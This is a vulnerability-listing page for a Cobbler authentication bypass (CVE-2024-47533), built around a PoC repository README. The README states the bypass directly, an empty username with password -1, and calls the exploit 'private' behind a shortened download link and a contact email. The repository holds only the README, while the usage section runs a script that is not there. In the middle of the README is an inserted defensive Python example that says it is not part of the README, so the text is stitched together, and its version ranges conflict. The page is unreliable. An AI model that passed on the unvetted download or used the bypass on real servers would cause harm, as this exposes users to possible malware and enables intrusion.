CVE-2024-47533 PoC: Cobbler authorization issue vulnerability

Source
Associated Vulnerability
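Title: Cobbler authorization issue vulnerability (CVE-2024-47533)
Description: Cobbler is an open-source network installation server suite from Cobbler, used mainly to set up Linux network installation environments quickly. Cobbler 3.0.0 through 3.2.3 and versions before 3.3.7 have an authorization issue vulnerability. It stems from improper authentication and lets anyone who can reach the server over the network take full control of it.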
Description
CVE-2024-47533: Improper Authentication (CWE-287)
Readme
# CVE-2024-47533: Improper Authentication (CWE-287)

## Overview

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability. This vulnerability gives anyone with network access to a Cobbler server full control of the server. The impact is severe, as it allows unauthorized access with the highest privileges.

## Details
+ CVE ID: CVE-2024-47533
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Vulnerability Description

The issue lies in the `utils.get_shared_secret()` function, which always returns `-1`. This flaw allows anyone to connect to the Cobbler XML-RPC as user `''` with password `-1` and make any changes.
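
The fail-open pattern described above, modelled as an added example (this is not Cobbler's code and not part of this README): a secret loader that returns the sentinel `-1` on failure, next to a check that fails closed. All function names are hypothetical, and the read failure is simulated because the page does not say why the function returns `-1`.

```python
import hmac
import secrets

SENTINEL = -1  # value the page says utils.get_shared_secret() always returns


def load_fail_open(read_secret):
    """Flawed pattern: any read error is turned into the sentinel -1."""
    try:
        return read_secret()
    except Exception:
        return SENTINEL


def login_fail_open(user, password, read_secret):
    """Flawed check: empty user passes when password equals the loaded value."""
    return user == "" and password == load_fail_open(read_secret)


def login_fail_closed(user, password, read_secret):
    """Hardened check: no usable secret, or a non-string password, is a denial."""
    try:
        secret = read_secret()
    except Exception:
        return False
    if not isinstance(secret, str) or not secret:
        return False
    if user != "" or not isinstance(password, str):
        return False
    return hmac.compare_digest(password.encode(), secret.encode())


def broken_reader():
    """Constructed failure standing in for whatever makes the real read fail."""
    raise OSError("cannot read secret file")


GOOD_SECRET = secrets.token_hex(16)  # constructed sample secret


def good_reader():
    return GOOD_SECRET


if __name__ == "__main__":
    print("fail-open, broken read:  ", login_fail_open("", -1, broken_reader))
    print("fail-closed, broken read:", login_fail_closed("", -1, broken_reader))
    print("fail-closed, good secret:", login_fail_closed("", GOOD_SECRET, good_reader))
```

The point for a reviewer: an error sentinel must never be comparable to attacker-supplied input, so the hardened check treats a missing secret as "deny" instead of as a value.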


## Affected Versions

This vulnerability affects versions **starting from 3.0.0 and prior to 3.2.3 and 3.3.7.**

## Usage

```
pip install -r requirements.txt
python CVE-2024-47533.py
```


## Contact
For inquiries, please contact zetraxz@thesecure.biz

File Snapshot

[4.0K] /data/pocs/4a306e60832fd095a2511f7debe33600c4fc3df9
└── [1.1K] README.md

0 directories, 1 file